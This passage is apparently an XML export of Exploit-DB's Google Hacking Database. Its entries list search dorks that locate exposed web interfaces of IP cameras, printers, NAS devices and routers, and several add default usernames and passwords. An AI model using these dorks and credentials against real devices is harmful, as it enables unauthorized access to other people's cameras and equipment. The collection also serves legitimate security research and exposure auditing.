<querystring>https://www.google.com/search?q=intitle:&quot;Epson Web Control&quot; &quot;OSD Control Pad&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>851</id>
<link>https://www.exploit-db.com/ghdb/851</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;EpsonNet WebAssist Rev&quot;</shortDescription>
<textualDescription>This reveals the Epson Web Assist page (internal to the machine)</textualDescription>
<query>intitle:&quot;EpsonNet WebAssist Rev&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22EpsonNet+WebAssist+Rev%22</querystring>
<edb></edb>
<date>2005-01-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1285</id>
<link>https://www.exploit-db.com/ghdb/1285</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Ethernet Network Attached Storage Utility&quot;</shortDescription>
<textualDescription>Linksys network storage utility.</textualDescription>
<query>intitle:&quot;Ethernet Network Attached Storage Utility&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Ethernet+Network+Attached+Storage++Utility%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>845</id>
<link>https://www.exploit-db.com/ghdb/845</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;EverFocus.EDSR.applet&quot;</shortDescription>
<textualDescription>The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 &amp; 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs.</textualDescription>
<query>intitle:&quot;EverFocus.EDSR.applet&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22EverFocus.EDSR.applet%22</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>691</id>
<link>https://www.exploit-db.com/ghdb/691</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;EvoCam&quot; inurl:&quot;webcam.html&quot;</shortDescription>
<textualDescription>Evocams !</textualDescription>
<query>intitle:&quot;EvoCam&quot; inurl:&quot;webcam.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22EvoCam%22+inurl:%22webcam.html%22&amp;c2coff=1&amp;start=0&amp;sa=Nurl</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1424</id>
<link>https://www.exploit-db.com/ghdb/1424</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;EvoCam&quot; inurl:&quot;webcam.html&quot;</shortDescription>
<textualDescription>This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: https://www.exploit-db.com/search/?action=search&amp;filter_page=1&amp;filter_description=evocam&amp;filter_exploit_text=&amp;filter_author=&amp;filter_platform=0&amp;filter_type=0&amp;filter_lang_id=0&amp;filter_port=&amp;filter_osvdb=&amp;filter_cve=
Author: Airloom</textualDescription>
<query>intitle:&quot;EvoCam&quot; inurl:&quot;webcam.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A&quot;EvoCam&quot;+inurl%3A&quot;webcam.html&quot;&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>898</id>
<link>https://www.exploit-db.com/ghdb/898</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Flash Operator Panel&quot; -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists</shortDescription>
<textualDescription>Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time.</textualDescription>
<query>intitle:&quot;Flash Operator Panel&quot; -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>969</id>
<link>https://www.exploit-db.com/ghdb/969</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Freifunk.Net - Status&quot; -site:commando.de</shortDescription>
<textualDescription>Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs.</textualDescription>
<query>intitle:&quot;Freifunk.Net - Status&quot; -site:commando.de</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Freifunk.Net+-+Status%22+-site%3Acommando.de</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8004</id>
<link>https://www.exploit-db.com/ghdb/8004</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Gargoyle Router Management Utility&quot; -com|net</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Gargoyle Router Management Utility&quot; -com|net
# Various Online Devices
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Gargoyle Router Management Utility&quot; -com|net</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Gargoyle Router Management Utility&quot; -com|net</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>1017</id>
<link>https://www.exploit-db.com/ghdb/1017</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;GCC WebAdmin&quot; -gcc.ru</shortDescription>
<textualDescription>All sorts of various printer status information</textualDescription>
<query>intitle:&quot;GCC WebAdmin&quot; -gcc.ru</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22GCC+WebAdmin%22+-gcc.ru</querystring>
<edb></edb>
<date>2005-06-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1286</id>
<link>https://www.exploit-db.com/ghdb/1286</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;GigaDrive Utility&quot;</shortDescription>
<textualDescription>Linksys GigaDrive network storage utility.</textualDescription>
<query>intitle:&quot;GigaDrive Utility&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22GigaDrive+Utility%22&amp;num=50&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4553</id>
<link>https://www.exploit-db.com/ghdb/4553</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;GitBucket&quot; intext:&quot;Recent updated repositories&quot; intext:&quot;Sign In&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;GitBucket&quot; intext:&quot;Recent updated repositories&quot; intext:&quot;Sign In&quot;
Description: Find GitBucket servers
Author: scumsec</textualDescription>
<query>intitle:&quot;GitBucket&quot; intext:&quot;Recent updated repositories&quot; intext:&quot;Sign In&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;GitBucket&quot; intext:&quot;Recent updated repositories&quot; intext:&quot;Sign In&quot;</querystring>
<edb></edb>
<date>2017-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6834</id>
<link>https://www.exploit-db.com/ghdb/6834</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;HD IP Camera&quot; &quot;Remember me&quot; &quot;User name&quot; -.com -pdf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;HD IP Camera&quot; &quot;Remember me&quot; &quot;User name&quot; -.com -pdf
# Various online devices.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;HD IP Camera&quot; &quot;Remember me&quot; &quot;User name&quot; -.com -pdf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HD IP Camera&quot; &quot;Remember me&quot; &quot;User name&quot; -.com -pdf</querystring>
<edb></edb>
<date>2021-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6890</id>
<link>https://www.exploit-db.com/ghdb/6890</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;HD-Network Real Time Monitoring System&quot; inurl:&quot;/login.asp&quot;</shortDescription>
<textualDescription># Google Dork:intitle:&quot;HD-Network Real Time Monitoring System&quot; inurl:&quot;/login.asp&quot;
# Pages Containing Login Portals
# Date: 19/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;HD-Network Real Time Monitoring System&quot; inurl:&quot;/login.asp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HD-Network Real Time Monitoring System&quot; inurl:&quot;/login.asp&quot;</querystring>
<edb></edb>
<date>2021-04-23</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7125</id>
<link>https://www.exploit-db.com/ghdb/7125</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Hello! Welcome to Synology Web Station!&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Hello! Welcome to Synology Web Station!&quot;
# Various Online Devices
# Date: 6/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Hello! Welcome to Synology Web Station!&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Hello! Welcome to Synology Web Station!&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5684</id>
<link>https://www.exploit-db.com/ghdb/5684</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Home - Mongo Express&quot;</shortDescription>
<textualDescription>Google dork description: Mongo Express instances. Most have no
authentication enabled
Google Search: intitle:&quot;Home - Mongo Express&quot;
Submitted by: Alfie
Twitter: https://twitter.com/emenalf
--
Regards,
Alfie.
the-infosec.com
</textualDescription>
<query>intitle:&quot;Home - Mongo Express&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Home - Mongo Express&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Alfie</author>
</entry>
<entry>
<id>656</id>
<link>https://www.exploit-db.com/ghdb/656</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Home&quot; &quot;Xerox Corporation&quot; &quot;Refresh Status&quot;</shortDescription>
<textualDescription>CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer.</textualDescription>
<query>intitle:&quot;Home&quot; &quot;Xerox Corporation&quot; &quot;Refresh Status&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22Home%22+%22Xerox+Corporation%22+%22Refresh+Status%22</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5127</id>
<link>https://www.exploit-db.com/ghdb/5127</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Home-CUPS&quot; intext:printers -mugs</shortDescription>
<textualDescription>CUPS printer deamons
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;Home-CUPS&quot; intext:printers -mugs</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Home-CUPS&quot; intext:printers -mugs</querystring>
<edb></edb>
<date>2019-02-18</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4199</id>
<link>https://www.exploit-db.com/ghdb/4199</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;homematic webui&quot;</shortDescription>
<textualDescription>Description: WebUI for Homematic Home-Control-System
Google search : intitle:&quot;homematic webui&quot;
Author : BasisX &amp; DonJoe</textualDescription>
<query>intitle:&quot;homematic webui&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;homematic webui&quot;</querystring>
<edb></edb>
<date>2016-02-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6132</id>
<link>https://www.exploit-db.com/ghdb/6132</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;HP ALM&quot; &quot;Application Lifecycle Management&quot; inurl:/qcbin/ -ext:PDF</shortDescription>
<textualDescription># Google Dork: intitle:&quot;HP ALM&quot; &quot;Application Lifecycle Management&quot;
inurl:/qcbin/ -ext:PDF
# Description: Find Hewlett Packard - Application Lifecycle Management.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>intitle:&quot;HP ALM&quot; &quot;Application Lifecycle Management&quot; inurl:/qcbin/ -ext:PDF</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HP ALM&quot; &quot;Application Lifecycle Management&quot; inurl:/qcbin/ -ext:PDF</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>BillyV4</author>
</entry>
<entry>
<id>3793</id>
<link>https://www.exploit-db.com/ghdb/3793</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;hp laserjet&quot; inurl:info_configuration.htm</shortDescription>
<textualDescription>HP LaserJet printers</textualDescription>
<query>intitle:&quot;hp laserjet&quot; inurl:info_configuration.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;hp laserjet&quot; inurl:info_configuration.htm</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4051</id>
<link>https://www.exploit-db.com/ghdb/4051</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;hp laserjet&quot; inurl:SSI/Auth/set_config_deviceinfo.htm</shortDescription>
<textualDescription># Exploit Title: Unprotected HP Laserjets
# Google Dork: intitle:&quot;hp laserjet&quot; inurl:SSI/Auth/set_config_deviceinfo.htm
# Date: 15/08/2015
# Exploit Author: Anonymous
Change default password or add your own password as the printers come without a password which allows others to mess with settings and print various things.</textualDescription>
<query>intitle:&quot;hp laserjet&quot; inurl:SSI/Auth/set_config_deviceinfo.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;hp laserjet&quot; inurl:SSI/Auth/set_config_deviceinfo.htm</querystring>
<edb></edb>
<date>2015-08-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>1050</id>
<link>https://www.exploit-db.com/ghdb/1050</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;HP ProCurve Switch *&quot; &quot;This product requires a frame capable browser.&quot;</shortDescription>
<textualDescription>HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details).</textualDescription>
<query>intitle:&quot;HP ProCurve Switch *&quot; &quot;This product requi</query>
<querystring>https://www.google.com/search?q=intitle:%22HP+ProCurve+Switch+*%22+%22This+product+requires+a+frame+capable+browser.%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3776</id>
<link>https://www.exploit-db.com/ghdb/3776</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;HtmlAnvView:D7B039C1&quot;</shortDescription>
<textualDescription>This dork finds Wireless Security/Webcams that are accessible from the
web. The interesting part is that for some reason these cameras do not
generally allow users to remove/change the default administrative
username and pass. So in most cases you can view any camera that shows
up in the google search.
Default Username: admin01
Default Password: 000000
111111
999999
Author: Paul White</textualDescription>
<query>intitle:&quot;HtmlAnvView:D7B039C1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HtmlAnvView:D7B039C1&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1372</id>
<link>https://www.exploit-db.com/ghdb/1372</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;iGuard Fingerprint Security System&quot;</shortDescription>
<textualDescription>vendor:http://www.iguardus.com/dome information disclosure: employeers list &amp; free camera access</textualDescription>
<query>intitle:&quot;iGuard Fingerprint Security System&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22iGuard+Fingerprint+Security+System%22+-ihackstuff</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5892</id>
<link>https://www.exploit-db.com/ghdb/5892</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cvsweb.cgi&quot;</shortDescription>
<textualDescription>Description: intitle:&quot;index of&quot; &quot;cvsweb.cgi&quot;
This google dork contains cvsweb configuration information related to
command gateway interface of different websites. Using this dork we can
find juicy information of different config files and repositories.
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cvsweb.cgi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cvsweb.cgi&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Siddhesh Thakur</author>
</entry>
<entry>
<id>6794</id>
<link>https://www.exploit-db.com/ghdb/6794</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Intelbras&quot; inurl:cgi-bin/firmware.cgi?formNumber=200</shortDescription>
<textualDescription># Dork: intitle:&quot;Intelbras&quot; inurl:cgi-bin/firmware.cgi?formNumber=200</textualDescription>
<query>intitle:&quot;Intelbras&quot; inurl:cgi-bin/firmware.cgi?formNumber=200</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Intelbras&quot; inurl:cgi-bin/firmware.cgi?formNumber=200</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6950</id>
<link>https://www.exploit-db.com/ghdb/6950</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Intelbras&quot; site:*/index.html</shortDescription>
<textualDescription># Dork: intitle:&quot;Intelbras&quot; site:*/index.html</textualDescription>
<query>intitle:&quot;Intelbras&quot; site:*/index.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Intelbras&quot; site:*/index.html</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1071</id>
<link>https://www.exploit-db.com/ghdb/1071</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;INTELLINET&quot; intitle:&quot;IP Camera Homepage&quot;</shortDescription>
<textualDescription>This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results. p.s. This was discovered by jeffball55 and cleaned up by golfo</textualDescription>
<query>intitle:&quot;INTELLINET&quot; intitle:&quot;IP Camera Homepage&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22INTELLINET%22+intitle:%22IP+Camera+Homepage%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>973</id>
<link>https://www.exploit-db.com/ghdb/973</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;InterJak Web Manager&quot;</shortDescription>
<textualDescription>A router device by Uroam (formerly FilaNet), with email and VPN possibilities.</textualDescription>
<query>intitle:&quot;InterJak Web Manager&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22InterJak+Web+Manager%22</querystring>
<edb></edb>
<date>2005-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5948</id>
<link>https://www.exploit-db.com/ghdb/5948</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Internet Services&quot; inurl:default.htm intext:&quot;FUJI XEROX&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>intitle:&quot;Internet Services&quot; inurl:default.htm intext:&quot;FUJI XEROX&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Internet Services&quot; inurl:default.htm intext:&quot;FUJI XEROX&quot;</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>1198</id>
<link>https://www.exploit-db.com/ghdb/1198</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Iomega NAS Manager&quot; -ihackstuff.com</shortDescription>
<textualDescription>Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future.</textualDescription>
<query>intitle:&quot;Iomega NAS Manager&quot; -ihackstuff.com</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Iomega+NAS+Manager%22+-ihackstuff.com&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5771</id>
<link>https://www.exploit-db.com/ghdb/5771</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IP CAMERA Viewer&quot; intext:&quot;setting | Client setting&quot;</shortDescription>
<textualDescription>####################Intro#####################
This dork shows TP-LINK, Zavio and Intellinet cameras stream.
################Default Creds##################
Zavio and TP-LINK | admin:admin
Intellinet | admin:1234
###############About me######################
Discovered by Roni Carta alias Lupin
Twitter : https://twitter.com/0xLupin
</textualDescription>
<query>intitle:&quot;IP CAMERA Viewer&quot; intext:&quot;setting | Client setting&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IP CAMERA Viewer&quot; intext:&quot;setting | Client setting&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>Lupin</author>
</entry>
<entry>
<id>6780</id>
<link>https://www.exploit-db.com/ghdb/6780</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IP Webcam&quot; inurl:&quot;/greet.html&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;IP Webcam&quot; inurl:&quot;/greet.html&quot;</textualDescription>
<query>intitle:&quot;IP Webcam&quot; inurl:&quot;/greet.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IP Webcam&quot; inurl:&quot;/greet.html&quot;</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7319</id>
<link>https://www.exploit-db.com/ghdb/7319</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IPC CHIP Main Page&quot; &quot;Beck IPC GmbH&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;IPC CHIP Main Page&quot; &quot;Beck IPC GmbH&quot;
# Various Online Devices
# Date: 19/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;IPC CHIP Main Page&quot; &quot;Beck IPC GmbH&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IPC CHIP Main Page&quot; &quot;Beck IPC GmbH&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>3905</id>
<link>https://www.exploit-db.com/ghdb/3905</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IPCam Client&quot;</shortDescription>
<textualDescription>Foscam IPCam
By default these cameras attach to the myfoscam.org DDNS. So you could add
site:myfoscam.org. On the otherhand if you're hunting for DDNS servers, you
could negate that site and examine the other results.
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>intitle:&quot;IPCam Client&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IPCam Client&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4068</id>
<link>https://www.exploit-db.com/ghdb/4068</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IPCam&quot; inurl:monitor2.htm</shortDescription>
<textualDescription>EasyN IP webcam WebUI.
Category: Various Online devices
- Fitzl Csaba</textualDescription>
<query>intitle:&quot;IPCam&quot; inurl:monitor2.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IPCam&quot; inurl:monitor2.htm</querystring>
<edb></edb>
<date>2015-09-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>708</id>
<link>https://www.exploit-db.com/ghdb/708</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ipcop - main&quot;</shortDescription>
<textualDescription>IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)</textualDescription>
<query>intitle:&quot;ipcop - main&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22ipcop+-+main%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>7233</id>
<link>https://www.exploit-db.com/ghdb/7233</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ipMonitor - Log in&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ipMonitor - Log in&quot;
# Various Online Devices
# Date: 15/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;ipMonitor - Log in&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ipMonitor - Log in&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1160</id>
<link>https://www.exploit-db.com/ghdb/1160</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603&quot; intitle:&quot;Live Images&quot;</shortDescription>
<textualDescription>This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system.</textualDescription>
<query>intitle:&quot;IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603&quot; intitle:&quot;Live Images&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22IQeye302+%7C+IQeye303+%7C+IQeye601+%7C+IQeye602+%7C+IQeye603%22+intitle:%22Live+Images%22&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-10-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1334</id>
<link>https://www.exploit-db.com/ghdb/1334</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;IVC Control Panel&quot;</shortDescription>
<textualDescription>this searches for security cameras, vendor site:http://www.ivcco.com/</textualDescription>
<query>intitle:&quot;IVC Control Panel&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22IVC+Control+Panel%22&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>767</id>
<link>https://www.exploit-db.com/ghdb/767</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;iVISTA.Main.Page&quot;</shortDescription>
<textualDescription>And again another webcam search. MOst of these cams seem to be security cams</textualDescription>
<query>intitle:&quot;iVISTA.Main.Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22iVISTA.Main.Page%22&amp;sourceid=firefox&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1040</id>
<link>https://www.exploit-db.com/ghdb/1040</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Java Applet Page&quot; inurl:ml</shortDescription>
<textualDescription>Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)</textualDescription>
<query>intitle:&quot;Java Applet Page&quot; inurl:ml</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Java+Applet+Page%22+inurl%3Aml+&amp;num=100</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>7198</id>
<link>https://www.exploit-db.com/ghdb/7198</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;JUNG KNX Smart-Panel&quot; &quot;JUNG Single Regular&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;JUNG KNX Smart-Panel&quot; &quot;JUNG Single Regular&quot;
# Various Online Devices
# Date: 08/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;JUNG KNX Smart-Panel&quot; &quot;JUNG Single Regular&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;JUNG KNX Smart-Panel&quot; &quot;JUNG Single Regular&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6817</id>
<link>https://www.exploit-db.com/ghdb/6817</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Keenetic Web&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Keenetic Web&quot;
# Various online devices (Keenetic Smart Home).
# Date: 03/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Keenetic Web&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Keenetic Web&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5947</id>
<link>https://www.exploit-db.com/ghdb/5947</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Kyocera Command Center&quot; inurl:index.htm</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>intitle:&quot;Kyocera Command Center&quot; inurl:index.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Kyocera Command Center&quot; inurl:index.htm</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>518</id>
<link>https://www.exploit-db.com/ghdb/518</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;lantronix web-manager&quot;</shortDescription>
<textualDescription>The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected.</textualDescription>
<query>intitle:&quot;lantronix web-manager&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22lantronix+web-manager%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5222</id>
